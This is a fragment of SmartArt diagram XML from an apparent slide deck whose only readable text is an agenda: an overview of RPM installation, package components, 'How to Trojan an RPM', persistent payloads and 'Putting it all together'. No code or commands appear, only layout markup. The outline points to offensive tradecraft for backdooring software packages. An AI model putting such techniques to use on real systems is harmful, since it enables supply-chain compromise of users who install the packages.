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7" r:id="rId11"/>
    <p:sldId id="268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50A35-954C-4E18-BAA2-BFA1E6232BF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FC7660-2960-4232-8797-7FCBECC0AC4C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Overview of RPM installation</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DCA29BB5-3C6B-4A1D-9D2F-2662DF234D39}" type="parTrans" cxnId="{1E2AFF65-AEC7-4F60-BC53-716443C13F4F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B050474-46C1-4681-A79D-11AD43997DFB}" type="sibTrans" cxnId="{1E2AFF65-AEC7-4F60-BC53-716443C13F4F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8609647C-5374-4C81-AE06-A7015E38A9C9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>Components of RPM package</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{022EC362-EDFE-4BD7-838C-268BA7CF7B2C}" type="parTrans" cxnId="{3708D7B9-FDA6-420E-B30C-5A1CD3A5661F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7B5DE44-9B83-49F7-8D19-1750405D98C1}" type="sibTrans" cxnId="{3708D7B9-FDA6-420E-B30C-5A1CD3A5661F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7B64B5B5-5F16-4DB3-91C8-54BDB5F9EE76}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>How to Trojan an RPM</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{353F24EA-8BFD-48F0-A2D3-EDDB2301F292}" type="parTrans" cxnId="{9A43840B-7D97-401C-8B6F-507C0EA4836B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{948BB8DD-472D-45B1-A858-E294B840B9C9}" type="sibTrans" cxnId="{9A43840B-7D97-401C-8B6F-507C0EA4836B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AE71BD19-3984-4CB4-96E1-FC23695B944C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>Persistent Payloads</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{169ECB93-4CA2-4D3F-9851-87FB82D12B95}" type="parTrans" cxnId="{F77FBE72-6D60-4975-9138-F03833710E5A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F7CBC0E-C08A-43A6-9435-99E7BA0DB445}" type="sibTrans" cxnId="{F77FBE72-6D60-4975-9138-F03833710E5A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{947EC460-D2CD-4A2E-8AB1-D932E5343457}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Putting it all together</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F69D818B-9B8E-450B-AC83-CE4961E2F53E}" type="parTrans" cxnId="{766E7F18-A4F6-4F1C-BB49-A653A0188045}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DCCF233B-6704-4646-95D9-67F01D032079}" type="sibTrans" cxnId="{766E7F18-A4F6-4F1C-BB49-A653A0188045}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" type="pres">
      <dgm:prSet presAssocID="{C2950A35-954C-4E18-BAA2-BFA1E6232BF4}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{93936B01-73F3-4D53-9E25-1AC2095C1F29}" type="pres">
      <dgm:prSet presAssocID="{ECFC7660-2960-4232-8797-7FCBECC0AC4C}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{131ECF73-C91E-4BE7-A182-AE0D695FD568}" type="pres">
      <dgm:prSet presAssocID="{ECFC7660-2960-4232-8797-7FCBECC0AC4C}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0B4AB940-4A84-4754-8E82-041B4A932EA5}" type="pres">
      <dgm:prSet presAssocID="{ECFC7660-2960-4232-8797-7FCBECC0AC4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EEDBFA-51A8-4595-B328-4908F0003259}" type="pres">
      <dgm:prSet presAssocID="{ECFC7660-2960-4232-8797-7FCBECC0AC4C}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F0F6BC86-DB5C-4A72-8F5B-C0E1F60797F9}" type="pres">
      <dgm:prSet presAssocID="{ECFC7660-2960-4232-8797-7FCBECC0AC4C}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{33FE3FCC-DFB6-45CB-B6A7-E069A02456F2}" type="pres">
      <dgm:prSet presAssocID="{4B050474-46C1-4681-A79D-11AD43997DFB}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9C5F9BFA-6AEE-4658-8C17-C917A7F61218}" type="pres">
      <dgm:prSet presAssocID="{8609647C-5374-4C81-AE06-A7015E38A9C9}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B0634658-7DCE-4C2B-82FC-437B4F8BBECE}" type="pres">
      <dgm:prSet presAssocID="{8609647C-5374-4C81-AE06-A7015E38A9C9}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3102F50E-4A12-4D0F-B75A-92C00D7CB633}" type="pres">
      <dgm:prSet presAssocID="{8609647C-5374-4C81-AE06-A7015E38A9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9E0D9C-2250-4DB4-A838-48FF027B34FA}" type="pres">
      <dgm:prSet presAssocID="{8609647C-5374-4C81-AE06-A7015E38A9C9}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9856F480-59A0-4C90-B7C9-E6EBF420C3A6}" type="pres">
      <dgm:prSet presAssocID="{8609647C-5374-4C81-AE06-A7015E38A9C9}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DF919FBE-CF20-4F9E-9322-7DD402790FA6}" type="pres">
      <dgm:prSet presAssocID="{F7B5DE44-9B83-49F7-8D19-1750405D98C1}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2DA577C7-A3E7-4290-A226-ECA007B2E978}" type="pres">
      <dgm:prSet presAssocID="{7B64B5B5-5F16-4DB3-91C8-54BDB5F9EE76}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9EC6864A-0CCB-45BE-A80F-FE82CD5FC541}" type="pres">
      <dgm:prSet presAssocID="{7B64B5B5-5F16-4DB3-91C8-54BDB5F9EE76}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1041981C-9058-4E5E-918F-91B2EDA979C2}" type="pres">
      <dgm:prSet presAssocID="{7B64B5B5-5F16-4DB3-91C8-54BDB5F9EE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5904D3-D192-4184-962D-F2ADD88AA792}" type="pres">
      <dgm:prSet presAssocID="{7B64B5B5-5F16-4DB3-91C8-54BDB5F9EE76}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3064F9D5-0F57-470F-AF26-5C29C8F66447}" type="pres">
      <dgm:prSet presAssocID="{7B64B5B5-5F16-4DB3-91C8-54BDB5F9EE76}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{46FFE099-5ECE-45C0-8EFF-65FB867D6724}" type="pres">
      <dgm:prSet presAssocID="{948BB8DD-472D-45B1-A858-E294B840B9C9}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FDE44E3A-3C7D-47A6-B9AD-DA1493CA177B}" type="pres">
      <dgm:prSet presAssocID="{AE71BD19-3984-4CB4-96E1-FC23695B944C}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{53756BC9-CD1C-4415-AC49-8598E2B9F31D}" type="pres">
      <dgm:prSet presAssocID="{AE71BD19-3984-4CB4-96E1-FC23695B944C}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{91711570-4645-4DDF-9D1B-D1E7F7CEFD52}" type="pres">
      <dgm:prSet presAssocID="{AE71BD19-3984-4CB4-96E1-FC23695B94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DF68C7-569D-4B3C-A0C4-576A381C0B6B}" type="pres">
      <dgm:prSet presAssocID="{AE71BD19-3984-4CB4-96E1-FC23695B944C}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7CED1E0A-76CA-4294-8D25-9348075726F3}" type="pres">
      <dgm:prSet presAssocID="{AE71BD19-3984-4CB4-96E1-FC23695B944C}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{46AE9617-27F9-434F-86DF-BDB2AC5E0B97}" type="pres">
      <dgm:prSet presAssocID="{3F7CBC0E-C08A-43A6-9435-99E7BA0DB445}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{001A4110-FDD4-4E9E-B713-D13528031ADF}" type="pres">
      <dgm:prSet presAssocID="{947EC460-D2CD-4A2E-8AB1-D932E5343457}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B4A013C4-F35E-4470-8AAC-C26D1E400E5C}" type="pres">
      <dgm:prSet presAssocID="{947EC460-D2CD-4A2E-8AB1-D932E5343457}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{13170697-3FB5-4433-8A9C-311E58943FA9}" type="pres">
      <dgm:prSet presAssocID="{947EC460-D2CD-4A2E-8AB1-D932E534345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B6E7F2D-C76E-4EFE-BE65-49FF9E84F2A7}" type="pres">
      <dgm:prSet presAssocID="{947EC460-D2CD-4A2E-8AB1-D932E5343457}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{44AA433A-56FF-4851-8F4D-4E2B56041CE1}" type="pres">
      <dgm:prSet presAssocID="{947EC460-D2CD-4A2E-8AB1-D932E534345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A43840B-7D97-401C-8B6F-507C0EA4836B}" srcId="{C2950A35-954C-4E18-BAA2-BFA1E6232BF4}" destId="{7B64B5B5-5F16-4DB3-91C8-54BDB5F9EE76}" srcOrd="2" destOrd="0" parTransId="{353F24EA-8BFD-48F0-A2D3-EDDB2301F292}" sibTransId="{948BB8DD-472D-45B1-A858-E294B840B9C9}"/>
    <dgm:cxn modelId="{766E7F18-A4F6-4F1C-BB49-A653A0188045}" srcId="{C2950A35-954C-4E18-BAA2-BFA1E6232BF4}" destId="{947EC460-D2CD-4A2E-8AB1-D932E5343457}" srcOrd="4" destOrd="0" parTransId="{F69D818B-9B8E-450B-AC83-CE4961E2F53E}" sibTransId="{DCCF233B-6704-4646-95D9-67F01D032079}"/>
    <dgm:cxn modelId="{E9626B21-F115-49BD-B62D-820C9C5F5830}" type="presOf" srcId="{947EC460-D2CD-4A2E-8AB1-D932E5343457}" destId="{13170697-3FB5-4433-8A9C-311E58943FA9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{AF819E23-85F7-4831-97DA-8A2BAE512CA5}" type="presOf" srcId="{C2950A35-954C-4E18-BAA2-BFA1E6232BF4}" destId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{84CC6D27-B3B6-484C-9727-CE3555275CD1}" type="presOf" srcId="{7B64B5B5-5F16-4DB3-91C8-54BDB5F9EE76}" destId="{9EC6864A-0CCB-45BE-A80F-FE82CD5FC541}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C1681B34-8592-45F8-B697-703C553B6985}" type="presOf" srcId="{ECFC7660-2960-4232-8797-7FCBECC0AC4C}" destId="{131ECF73-C91E-4BE7-A182-AE0D695FD568}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{70C1FC3D-836B-40D3-B38A-B8DD19ED0449}" type="presOf" srcId="{947EC460-D2CD-4A2E-8AB1-D932E5343457}" destId="{B4A013C4-F35E-4470-8AAC-C26D1E400E5C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B05AC55C-3B51-4F8D-9CB8-9CD94540F405}" type="presOf" srcId="{8609647C-5374-4C81-AE06-A7015E38A9C9}" destId="{3102F50E-4A12-4D0F-B75A-92C00D7CB633}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E4289045-CC7B-4E33-9042-0DD69100C5F9}" type="presOf" srcId="{AE71BD19-3984-4CB4-96E1-FC23695B944C}" destId="{91711570-4645-4DDF-9D1B-D1E7F7CEFD52}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1E2AFF65-AEC7-4F60-BC53-716443C13F4F}" srcId="{C2950A35-954C-4E18-BAA2-BFA1E6232BF4}" destId="{ECFC7660-2960-4232-8797-7FCBECC0AC4C}" srcOrd="0" destOrd="0" parTransId="{DCA29BB5-3C6B-4A1D-9D2F-2662DF234D39}" sibTransId="{4B050474-46C1-4681-A79D-11AD43997DFB}"/>
    <dgm:cxn modelId="{F77FBE72-6D60-4975-9138-F03833710E5A}" srcId="{C2950A35-954C-4E18-BAA2-BFA1E6232BF4}" destId="{AE71BD19-3984-4CB4-96E1-FC23695B944C}" srcOrd="3" destOrd="0" parTransId="{169ECB93-4CA2-4D3F-9851-87FB82D12B95}" sibTransId="{3F7CBC0E-C08A-43A6-9435-99E7BA0DB445}"/>
    <dgm:cxn modelId="{C4D14885-25E6-403A-A01E-C23AA508F94B}" type="presOf" srcId="{AE71BD19-3984-4CB4-96E1-FC23695B944C}" destId="{53756BC9-CD1C-4415-AC49-8598E2B9F31D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{905D5EAB-E845-4FC6-9E99-7BE1C87E7C45}" type="presOf" srcId="{8609647C-5374-4C81-AE06-A7015E38A9C9}" destId="{B0634658-7DCE-4C2B-82FC-437B4F8BBECE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{3708D7B9-FDA6-420E-B30C-5A1CD3A5661F}" srcId="{C2950A35-954C-4E18-BAA2-BFA1E6232BF4}" destId="{8609647C-5374-4C81-AE06-A7015E38A9C9}" srcOrd="1" destOrd="0" parTransId="{022EC362-EDFE-4BD7-838C-268BA7CF7B2C}" sibTransId="{F7B5DE44-9B83-49F7-8D19-1750405D98C1}"/>
    <dgm:cxn modelId="{F25CACD1-511A-4C0A-A1BE-2416607470D7}" type="presOf" srcId="{ECFC7660-2960-4232-8797-7FCBECC0AC4C}" destId="{0B4AB940-4A84-4754-8E82-041B4A932EA5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E7F029D2-8B0F-4F15-8DC0-42D9B991AC33}" type="presOf" srcId="{7B64B5B5-5F16-4DB3-91C8-54BDB5F9EE76}" destId="{1041981C-9058-4E5E-918F-91B2EDA979C2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8EBBD57F-6271-4267-BA24-EA7093AF394A}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{93936B01-73F3-4D53-9E25-1AC2095C1F29}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A9B62BBC-74A6-4F0C-820E-78DDDB205EE0}" type="presParOf" srcId="{93936B01-73F3-4D53-9E25-1AC2095C1F29}" destId="{131ECF73-C91E-4BE7-A182-AE0D695FD568}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{D78972D1-024D-4EE6-BF74-AD1D91A0D2EE}" type="presParOf" srcId="{93936B01-73F3-4D53-9E25-1AC2095C1F29}" destId="{0B4AB940-4A84-4754-8E82-041B4A932EA5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A8473353-B4F0-491D-95BB-E8013F360B4D}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{0AEEDBFA-51A8-4595-B328-4908F0003259}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{EDB9DD49-4461-4449-949D-401719F239F5}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{F0F6BC86-DB5C-4A72-8F5B-C0E1F60797F9}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CA04E272-6570-4E18-B8DB-E31F79D4EF1D}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{33FE3FCC-DFB6-45CB-B6A7-E069A02456F2}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{3E87F9A2-F85A-45AD-850C-DE8053179164}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{9C5F9BFA-6AEE-4658-8C17-C917A7F61218}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{58CB4D99-8403-4DD2-8BBB-FF4DABA04488}" type="presParOf" srcId="{9C5F9BFA-6AEE-4658-8C17-C917A7F61218}" destId="{B0634658-7DCE-4C2B-82FC-437B4F8BBECE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{59EA5956-BBBA-42B4-AD40-1424600CFB03}" type="presParOf" srcId="{9C5F9BFA-6AEE-4658-8C17-C917A7F61218}" destId="{3102F50E-4A12-4D0F-B75A-92C00D7CB633}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{57F04D88-6B08-46E2-B630-C53A8F425F08}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{EC9E0D9C-2250-4DB4-A838-48FF027B34FA}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{2A02EA17-29E3-4BAE-8397-02374A85284D}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{9856F480-59A0-4C90-B7C9-E6EBF420C3A6}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{48AF54C2-A880-41BE-A1DA-C3DE2DB1C13A}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{DF919FBE-CF20-4F9E-9322-7DD402790FA6}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1367E0ED-D9D2-436A-965E-29ECA34A497F}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{2DA577C7-A3E7-4290-A226-ECA007B2E978}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{7133DAE9-1BF0-43A2-84F4-F53E029C56BB}" type="presParOf" srcId="{2DA577C7-A3E7-4290-A226-ECA007B2E978}" destId="{9EC6864A-0CCB-45BE-A80F-FE82CD5FC541}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F147B3A4-66B2-48AE-8D48-4423FA30A631}" type="presParOf" srcId="{2DA577C7-A3E7-4290-A226-ECA007B2E978}" destId="{1041981C-9058-4E5E-918F-91B2EDA979C2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{15A62489-C249-4BBC-AD3F-C2311CE4583D}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{BE5904D3-D192-4184-962D-F2ADD88AA792}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{28F4502F-B2FF-4FB9-A692-62D3A57330E6}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{3064F9D5-0F57-470F-AF26-5C29C8F66447}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DC996F54-E161-48F1-9FEA-5FC2B367C873}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{46FFE099-5ECE-45C0-8EFF-65FB867D6724}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{50500DF9-6358-46C7-9C02-2332FD06F06E}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{FDE44E3A-3C7D-47A6-B9AD-DA1493CA177B}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1334C136-5B2F-4977-9A99-33BA584016C1}" type="presParOf" srcId="{FDE44E3A-3C7D-47A6-B9AD-DA1493CA177B}" destId="{53756BC9-CD1C-4415-AC49-8598E2B9F31D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{7AA4581A-B7CD-43D4-A00A-D8C4B27293D3}" type="presParOf" srcId="{FDE44E3A-3C7D-47A6-B9AD-DA1493CA177B}" destId="{91711570-4645-4DDF-9D1B-D1E7F7CEFD52}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5B845450-00D9-4000-A72E-92F27A62DE3B}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{8EDF68C7-569D-4B3C-A0C4-576A381C0B6B}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A5F9301B-A3CD-4AE5-92B3-F49FAAB77D8B}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{7CED1E0A-76CA-4294-8D25-9348075726F3}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{77D2BF42-00B1-4A77-AAF4-7B35B6065279}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{46AE9617-27F9-434F-86DF-BDB2AC5E0B97}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{08EA2DD6-DB58-41CF-AF1F-6CFA6A604002}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{001A4110-FDD4-4E9E-B713-D13528031ADF}" srcOrd="16" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{970B7E0E-C6FD-4C3F-904F-8E7BDE77E00D}" type="presParOf" srcId="{001A4110-FDD4-4E9E-B713-D13528031ADF}" destId="{B4A013C4-F35E-4470-8AAC-C26D1E400E5C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{03F9B704-0BBE-4C1F-9ECD-685C38BAD1E9}" type="presParOf" srcId="{001A4110-FDD4-4E9E-B713-D13528031ADF}" destId="{13170697-3FB5-4433-8A9C-311E58943FA9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CC34193D-5FF6-4D5E-8F0B-239A47B8DD47}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{3B6E7F2D-C76E-4EFE-BE65-49FF9E84F2A7}" srcOrd="17" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{66C866A1-02A9-4008-92A7-B3F945D19726}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{44AA433A-56FF-4851-8F4D-4E2B56041CE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BC86-DB5C-4A72-8F5B-C0E1F60797F9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="44699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AB940-4A84-4754-8E82-041B4A932EA5}">
